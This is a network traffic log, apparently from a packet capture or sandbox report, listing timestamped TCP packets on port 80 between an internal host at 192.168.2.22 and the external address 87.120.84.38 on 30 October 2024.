Oct 30, 2024 08:25:04.584630966 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584650993 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584650993 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584673882 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584686995 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584697962 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584707975 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584717035 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584733963 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584743023 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584769011 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584790945 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584839106 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584971905 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584986925 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585021019 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.585140944 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585151911 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585160971 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585189104 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.585200071 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.585335016 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585345984 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585356951 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585386038 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.585395098 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.585480928 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585491896 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585501909 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585511923 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585524082 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.585524082 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585542917 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.585552931 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.585561037 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.585665941 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585676908 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585685968 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585699081 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585709095 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585716009 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.585726976 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.585747004 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.585838079 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585849047 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585863113 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585874081 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585877895 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.585885048 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585902929 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585902929 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.585912943 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585916042 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.585923910 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585936069 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585943937 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.585947037 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.585957050 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.585971117 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.585988045 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586072922 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586082935 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586092949 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586102962 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586113930 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586122990 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586124897 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586137056 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586150885 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586159945 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586256027 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586266994 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586276054 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586287975 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586303949 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586304903 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586323977 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586323023 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586332083 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586334944 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586342096 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586350918 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586361885 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586368084 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586378098 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586379051 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586390018 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586397886 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586397886 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586405993 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586417913 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586421013 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586426973 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586437941 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586440086 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586447001 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586447954 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586457014 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586467028 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586469889 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586488008 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586493969 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586509943 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586513996 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586520910 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586530924 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586539984 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586553097 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586571932 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586584091 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586596012 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586616039 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586618900 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586637020 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586658001 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586664915 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586664915 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586668968 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586678982 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586688995 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586702108 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586704969 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586720943 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586729050 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586739063 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586764097 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586783886 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586796045 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586854935 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586865902 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586875916 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586889029 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586901903 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586901903 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586913109 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586924076 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.586930990 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586941004 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.586968899 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587013006 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587029934 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587044954 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587055922 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587059021 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587066889 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587078094 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587086916 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587105989 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587111950 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587124109 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587135077 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587145090 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587157011 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587178946 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587225914 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587238073 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587249041 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587274075 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587284088 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587321997 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587333918 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587343931 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587353945 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587364912 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587383032 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587383986 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587404966 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587404966 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587429047 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587433100 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587444067 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587454081 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587465048 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587470055 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587486982 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587503910 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587539911 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587552071 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587562084 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587574005 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587587118 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587587118 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587604046 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587614059 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587629080 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587869883 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587879896 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587889910 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587902069 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587910891 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587919950 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587924004 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587935925 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587941885 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587948084 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.587950945 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587971926 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.587990046 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588028908 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588041067 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588052034 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588076115 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588087082 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588180065 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588191032 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588201046 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588212013 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588222027 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588227034 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588239908 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588243008 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588262081 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588274002 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588337898 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588355064 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588366032 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588377953 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588390112 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588391066 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588402987 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588403940 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588419914 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588445902 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588445902 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588488102 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588500023 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588524103 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588535070 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588535070 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588546991 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588558912 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588561058 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588579893 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588589907 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588685036 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588696957 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588706970 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588717937 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588730097 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588732958 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588742018 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588752031 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588753939 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588763952 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588764906 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588785887 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588799000 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588828087 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588839054 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588848114 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588859081 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588869095 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588875055 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588891029 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588906050 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.588968039 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588984013 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.588994026 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589004040 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589016914 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589020014 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589026928 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589027882 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589039087 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589041948 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589065075 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589075089 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589148998 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589159966 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589169979 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589196920 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589207888 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589301109 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589310884 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589324951 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589342117 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589346886 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589353085 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589364052 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589366913 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589385033 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589386940 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589401007 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589402914 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589413881 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589418888 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589423895 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589433908 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589440107 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589446068 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589452982 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589457035 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589468002 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589473009 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589478016 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589485884 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589493990 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589504957 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589505911 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589515924 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589517117 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589529037 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.589533091 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589549065 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589570999 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.589632988 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.701775074 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.701787949 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.701800108 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.701833963 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.701845884 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.701858044 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.701867104 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.701874971 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.701885939 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.701898098 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.701931953 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.702007055 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.702007055 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.702007055 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.702007055 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.702007055 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.702014923 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.702027082 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.702045918 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.702056885 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.702073097 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.702075005 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.702091932 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.702105045 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.702124119 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.702151060 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.702162981 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.702173948 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.702186108 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.702198982 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.702198982 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.702214956 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.702244997 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.710788965 CET	80	49163	87.120.84.38	192.168.2.22
